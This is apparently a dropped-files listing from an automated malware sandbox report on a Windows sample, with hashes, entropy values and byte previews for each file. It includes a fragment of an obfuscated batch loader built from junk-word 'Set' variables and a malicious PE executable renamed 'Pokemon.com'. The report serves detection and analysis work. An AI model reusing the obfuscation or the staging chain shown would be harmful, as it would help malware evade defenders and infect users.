                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3500
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.395930975393372
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:6NnCWHCgNnCcbCrNnCI9CCNnCBdgECfNnCPJiCPlNnCoDCdNnCQ8wwCQDNnCMH3x:6NbNWNTNCsNCJPlN3kN5eNv
                                                                                                                                                                                                                                                                                    MD5:C00C77CD91E9E6E506CAA1B8A36E7690
                                                                                                                                                                                                                                                                                    SHA1:B2125D805C719CE30F78757277D4AF4D1D5634ED
                                                                                                                                                                                                                                                                                    SHA-256:90123B813355D07876B4D7563DFC57C6DB9B8F8B9416C877E7423C7D18184686
                                                                                                                                                                                                                                                                                    SHA-512:20181C8CCB6386B662A81ACD6AB9E4757E8DA70958DF36D69EDC6FA7688792960F48F90FC47552B1B675AC4913BF7106E6883BEC56ECA544F3A8CE3F04A97164
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/2737316124E47F25768141817B65685E",.. "id": "2737316124E47F25768141817B65685E",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/2737316124E47F25768141817B65685E"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/FC530943E3DF0FC5A084737B47719CC7",.. "id": "FC530943E3DF0FC5A084737B47719CC7",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/FC530943E3DF0FC5A084737B47719CC7"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1787
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.368387414522049
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:SfNaoC6YbGzYbGMTEC6YbrfNaoCIC4fNaoC1C9fNaoCf0UrU0U8C70:6NnC6YbGzYbGMTEC6YbDNnCICENnC1CI
                                                                                                                                                                                                                                                                                    MD5:B232DE1192237D406C2E72E86955D125
                                                                                                                                                                                                                                                                                    SHA1:585C6FAC5EED6AB3C23175D11249C73C06800023
                                                                                                                                                                                                                                                                                    SHA-256:4BDB3D92D10418880EB04A7533FB9B6C02A4BA4E912C1159872D3250FE210467
                                                                                                                                                                                                                                                                                    SHA-512:80973A5C1622D7FBEFE26F795D136347D0B9F4F1512EF9156134ACCFBBB27645977DF7064433F8E7DF0A9B0D46D6F5657C6DB4E52D733A46504D666F54DB61CC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/2D41FF738A7B1516D75F1DC83FF68735",.. "id": "2D41FF738A7B1516D75F1DC83FF68735",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/2D41FF738A7B1516D75F1DC83FF68735"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/A889530C327498186506E1125C6FAEBF",.. "id": "A889530C327498186506E1125C6FAEBF",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/A889530C327498186506E1125C6FAEBF"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\0590af6b-c963-40f2-a8ee-126979d65b1e.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):154477
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                    MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                    SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                    SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                    SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\208079\Pokemon.com

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):947288
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                    MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                    SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                    SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                    SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                                                                    • Filename: appFile.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    • Filename: FloydMounts.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    • Filename: installer.bat, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    • Filename: skript.bat, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    • Filename: din.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    • Filename: yoda.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    • Filename: script.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    • Filename: installer_1.05_36.4.zip, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\208079\y

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):289803
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999407118473164
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:6144:kP5nMQopQeJwMOp0k6zaZe5Unzo+qi6der2K11BM43v6OHO:Kno6GX5UNktM1S43v6Ou
                                                                                                                                                                                                                                                                                    MD5:DB516B9F20952140987991EF8D7FD275
                                                                                                                                                                                                                                                                                    SHA1:79C0E281FE70569F6B61809E00C8C5373B200C8F
                                                                                                                                                                                                                                                                                    SHA-256:7CDA13CF076D5E9BFEEC6EEC950AB98DA17883798BF4EB48512E17A48AAF92D6
                                                                                                                                                                                                                                                                                    SHA-512:748A69F9A1FF98657AD74DF1CC38361A6A8E50BF4428244DF84C4F99F044ED4C8808A929B3C48DE769FA56D7B4093378C59062EF9358F9B9D62E0CFF09DA1DEE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:y.V....%.V..2.8~y'3.7....WJ..T!.J.....(../.?....&.../@B..r.:.I...b2.+....F.Kfao..b.%....D\@}..&.w?....5...9RI...>;v...Xt..{..."...0..g......../.K..n.|[..L*X......~&c....9.H.[..D3..N.I.^<.5YF4l3........BF.'.n.'.|.c.0...5......q(R..J....H......./cqj...3bw..6F...1..5%Op...V.K..zB.........(......r.>!.;D....t.(..u.....}~Q..?f.lk..H....B.5..\....%.)...^....Dy:.........h...."7.t9A5B}tX....6.f.;.T......6..$..q..@..h....5..j..O...-&...u3..X.%..~....,.{.R.....9...[....ES=c<.......xW....#.. .G../."7.r.......H..Z...|.s..$j..Gr`1e..0....y.U...9..3VU.W...Ykn&..Z....*....Q..VXL0.....,.H...[..}h....X].xa.~..b:..>..?.t........J#]9W.%k..n..x;d.;s,.._. .Z7j..1.>...e}a.*.. .&a^..$dh..6..41........s..N.65.S....i.@. ..9.M.-..P....|...e1..y7#(....&..... J...]p.s.~vf7......z...t=-\..........n...e=.....3....q./.&~.v.....2.)..Z.....E `...[.].r.U.H1....vka4."t..b.......-.B%.....(.iYL.......S. .%B.....-3F.05L...5.v..P....F........?vx.^.n^O.k6O.....&..L..?/.t.L$..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\33a71b0e-82e4-4b89-a895-a9c56c68cd0a.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\649b2c51-3098-4254-83b4-c940498bcb41.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):103855
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.924096864897051
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:xPo7/iGyQVUdJpABfSi77IbHZ0PmFKDz/M7tz:Vo7iGyQVUd0Bf77cZPjt
                                                                                                                                                                                                                                                                                    MD5:C87FF70A13D1089FA3A1E4D6B868C7A9
                                                                                                                                                                                                                                                                                    SHA1:989C6A3862280ABF8AFC1D27EEED6DA600281760
                                                                                                                                                                                                                                                                                    SHA-256:45D219AEA7DF0CF5A4327D91C7477FDF30DCB1B6621B1740D6C9975CC77C269A
                                                                                                                                                                                                                                                                                    SHA-512:4F4EA9C6075CAB97B58D4839CAAD0D9882E1EEFA50FE3D499D07AA7F758A3BCDEBFB375D90ABE40E971D18D9A2B3298466F1AA6B95CEAE03C419B525AF2E87F0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR... ... .....szz.....bKGD............./IDATX..W}l.E..3..w.+..H.|...D.%..M.Z5.I..&.Q....W.%.P..!.&.Q.."..0...H.Z.".....>Z....A.......m.....1..........{...A........<.-a.27j..... '.A.D...kVI.B..A...}..o:/...h<..E....M2r.0.PP<j.j..e]..>lh.(..?u.....KqB.7CP..8.D.a.$.%..??.iG.=+.~..2FH...\am;}...n......h~.H...........#KvW..w;.#.dc..1.JW.2...(...nu.Q0....,..H0..1)..[....^.P..r..;.`{.d........%...6.......@.."O.+"&zSym.,.Nn..L..*pj.&K.Z.....yH=..R.P?.i..Td...Sb.%o.....w..R`.sOJIjQ*.>...i.v....A.CD|bfx....).o.g.....I....6...!....<.t*|"....PO*<".:/+..>1.......R.o...@.../"y.",S.@...B..h...Z...P.>.......+...:z........7,:.....|)C.p.H+`i..e).8...zA".$:Z.o.........j]].....K:.....ZI.. ....~.*.&........:]...*w.md./zkT.Z..F........,."7|.|u..3....G.../7.oJ...*...7..~l......PY.HQ>..`$........2.{.....>( I,...h..I...N.y}=..VN.R.....IH..kp.V..|Io.+k...Eb.ES>.E2......Z.._.I .q0..0.......F.&D.(D1.Q+.M...!z9.....#xV.p....nH....7....\t.w"`F...-

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\7daef2d8-2899-4029-9ef3-93cae06edda9.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):31335
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                    MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                    SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                    SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                    SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Assisted

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):137216
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.71727594889715
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:cydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQW:c7HS3zcNPj0nEo3tb2O
                                                                                                                                                                                                                                                                                    MD5:679E13784150AE8B2932CCF3F57419C8
                                                                                                                                                                                                                                                                                    SHA1:9A9AB28DFBC4B30CDAE618EDDE9CD94ACA356BA0
                                                                                                                                                                                                                                                                                    SHA-256:B575163B61826F64C125DE3ADEE28F80CA41D31DC689A0F42F00D4BC5A261767
                                                                                                                                                                                                                                                                                    SHA-512:AF0EC2BDE3431C5B33D452C7780D38CDACDF5A5DCFAB33DE12AD62BF83F6A3D1E87BC172C30517DDA6E02D4D17CCF99EF8341AA30B2363A8EABA75DA43DBE460
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:9E.......;~|..x..........}....t+..%....=....u..............................U..............L......3....E.,K.......K.9.. cL....;M........E....E.@P.u...V.u..u............P.......E...@..P.u.V.u..u...........c....E.9E...5...;~|.............}....t*..%....=....u.............%...........................L......3....E.,K.......K.;E....;M........E....E.@P.u...V.u..u.............X.......E...@..P.u.V.u..u.................E.9E...e...;~|.............}....t*..%....=....u.............%...........................L......3....E.,K.......K.;E....;M.......E....E.@P.u...V.u..u..+..........X........E...@..P.u.V.u..u.................E.9E.......;~|.............}....t+..%....=....u..........................................L.........E.,K.......K.... cL....t....t.3........;E........E....E.@P.u...V.u..u..H..........E.........E...@..P.u.V.u..u.. ..............E.;E.......;~|.............}....t/..%....=....u.............%................E......w>............w..........rX........... uJ..........t...

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Automatically

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):101376
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.583125979099736
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:Kt8T6pUkBJR8CThpmESv+AqVnBypIbv18mLthfP:K6AUkB0CThp6vmVnjphfP
                                                                                                                                                                                                                                                                                    MD5:2881154413FC08B35D08260CC9921DC4
                                                                                                                                                                                                                                                                                    SHA1:FA1D544962FF9726CB46ED6D4A2CEB31C3A4F10D
                                                                                                                                                                                                                                                                                    SHA-256:81DFF5613AFFEFA47928CE7E99866F778641951DF1C1ACF4981478D52DD0D76D
                                                                                                                                                                                                                                                                                    SHA-512:C51B0BBC0ED19E586E24BB6200DD2584D569C25050118DA09585C89DB874CCAA8154A3B53A4E22602F3AE229337E729839497C1F57AB79D4EA52F847D0C9B411
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.X.C.......Sj..v..M.......M$.E.P.Rt.....P.u........t?.s.V....S.u...W....................M$..V..d..V.v...W.p...Y.@..3.j.Z.C..........Q.K....4...V.u.W.Q....M$...3.f..>W.d..W.-...Y......M.......} .to.u....<.....t............8....F......P.M..k....M$.E.P.us..j..M..]...E..t....E#.E#j.......E .E j.P.u.........J.E..t.j..u..E#P....f..E#......P..j..u..E P........u .M.......M$.E.P..r...M..l..._^3.[.. .U... SVW...M..}...<...........E..x..u..u......7....>3..F......q...3.C9X........@..M.3..u..u..0.u.......}..t..M.......M.p.......u.3..]..E...P.E.P.E.P.......E...u..}...j.....[.......E..M.X..0..........E..u|.E..j._.......].....s.;.v..u....t....&..F.........u5.C.j)...m.....u%.;.......y..u....=....F......&.j._.x.C..M.Rj..u..t...[.E.3.C...9X.v..u.........&..^.j...u+.@.j).........u.........y..u.........^..Rj..u..E...P.E.P.......M......._^[....U..SVW.}.......G..F..G .F ..t..@..G$.F$..t..@..O..V.3.S......O..V.S......O..V.S......O..V.S.....O..V.S.....O..V.S........._^[]...U..E...3..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Brisbane

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\JA7cOAGHym.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (705), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):13988
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1300744291006
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:UKfSrpYlFeOETs3AZQ/zAij0e46BO1HvCk9Dr36qmuQ:dyYlFdETswZQb3IEUBvprg
                                                                                                                                                                                                                                                                                    MD5:7022BF98FE2059295B0B5F9AFB45C3BB
                                                                                                                                                                                                                                                                                    SHA1:74E4E39E8CB43CE71ECFEE70E27A3949AD1CD52C
                                                                                                                                                                                                                                                                                    SHA-256:D810BC7CB8297BA644F1D151A94C0E3D1C478B352038BD04F279D503BF9B3D63
                                                                                                                                                                                                                                                                                    SHA-512:C3C182724A653CE8248E04EEAB542318FCB0CFDC8932FE23600BC4798210D5DFE324017E1FCEBA3F8B6EB185B7F9D19C03EB3FE006E291B48F98272FC02465FA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:Set Agrees=l..bYoXValve-Balloon-Tricks-Odds-Syndicate-..XHrkMove-Mysterious-Boxed-Stevens-Automobiles-..cEYVAble-..LayVInvestments-..bnLicensing-Ar-Due-..crJill-Webster-Edited-Ali-Jm-Camping-Governmental-..PCCEMotion-Tony-Bahrain-Winner-Through-Living-Soldier-Animals-Nec-..leyNecessity-Serial-Scotia-..qBhAttention-Push-Tractor-Deer-..Set Fisting=a..djjCock-Tourism-Possibly-Trains-Enquiries-Reasons-Verified-..LYjCompare-Stack-Airline-Rich-Wrap-Pupils-Produces-Administrative-Defendant-..keInduced-Imagine-Expansion-Q-Beautiful-..AnPants-Adjustable-Clear-..pDuQYouth-Gore-Connecting-Clinic-Falls-Cliff-Brick-Fine-..CkAPounds-Opinion-..SfGOver-Pediatric-Replied-Lime-Unity-Controller-..FqBusy-Theology-Honda-Contrast-Darwin-..hgyoReggae-Readers-Visual-Derek-Regime-It-..CAEating-Kinds-Combining-..Set Indigenous=U..jzvIKnowledgestorm-Bacteria-Surrounding-Nottingham-Own-Mining-Duke-..aXTDetermine-Everybody-Powerseller-Designated-Ira-Wa-Went-..eZXChrome-Determine-Jesse-Speech-Gather-Blogger-Hrs-..p

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Brisbane.cmd (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (705), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):13988
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1300744291006
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:UKfSrpYlFeOETs3AZQ/zAij0e46BO1HvCk9Dr36qmuQ:dyYlFdETswZQb3IEUBvprg
                                                                                                                                                                                                                                                                                    MD5:7022BF98FE2059295B0B5F9AFB45C3BB
                                                                                                                                                                                                                                                                                    SHA1:74E4E39E8CB43CE71ECFEE70E27A3949AD1CD52C
                                                                                                                                                                                                                                                                                    SHA-256:D810BC7CB8297BA644F1D151A94C0E3D1C478B352038BD04F279D503BF9B3D63
                                                                                                                                                                                                                                                                                    SHA-512:C3C182724A653CE8248E04EEAB542318FCB0CFDC8932FE23600BC4798210D5DFE324017E1FCEBA3F8B6EB185B7F9D19C03EB3FE006E291B48F98272FC02465FA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:Set Agrees=l..bYoXValve-Balloon-Tricks-Odds-Syndicate-..XHrkMove-Mysterious-Boxed-Stevens-Automobiles-..cEYVAble-..LayVInvestments-..bnLicensing-Ar-Due-..crJill-Webster-Edited-Ali-Jm-Camping-Governmental-..PCCEMotion-Tony-Bahrain-Winner-Through-Living-Soldier-Animals-Nec-..leyNecessity-Serial-Scotia-..qBhAttention-Push-Tractor-Deer-..Set Fisting=a..djjCock-Tourism-Possibly-Trains-Enquiries-Reasons-Verified-..LYjCompare-Stack-Airline-Rich-Wrap-Pupils-Produces-Administrative-Defendant-..keInduced-Imagine-Expansion-Q-Beautiful-..AnPants-Adjustable-Clear-..pDuQYouth-Gore-Connecting-Clinic-Falls-Cliff-Brick-Fine-..CkAPounds-Opinion-..SfGOver-Pediatric-Replied-Lime-Unity-Controller-..FqBusy-Theology-Honda-Contrast-Darwin-..hgyoReggae-Readers-Visual-Derek-Regime-It-..CAEating-Kinds-Combining-..Set Indigenous=U..jzvIKnowledgestorm-Bacteria-Surrounding-Nottingham-Own-Mining-Duke-..aXTDetermine-Everybody-Powerseller-Designated-Ira-Wa-Went-..eZXChrome-Determine-Jesse-Speech-Gather-Blogger-Hrs-..p

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Cars

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):34229
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.176230259714888
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:ZOTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:8TGODv7xvTphAiPChgZ2kOE6
                                                                                                                                                                                                                                                                                    MD5:F37691E9FF7DB399507A1680E937C8AD
                                                                                                                                                                                                                                                                                    SHA1:5E28AFA103E5183A5ACB7B1CCE9FBD5781CB61A0
                                                                                                                                                                                                                                                                                    SHA-256:292424CB00CB8F14F25589106A61B52DEE4A8C4253E891FB3C66DDDBE9FE210B
                                                                                                                                                                                                                                                                                    SHA-512:D5E58FCB7215BC56494DD9E05F04428372456742CFB7682A1018FE044ECB2F9212088F1082F4D5C2D55B46DF7EEA4BE3A504D4D6FF818C3AAB9868C7B33A7CD7
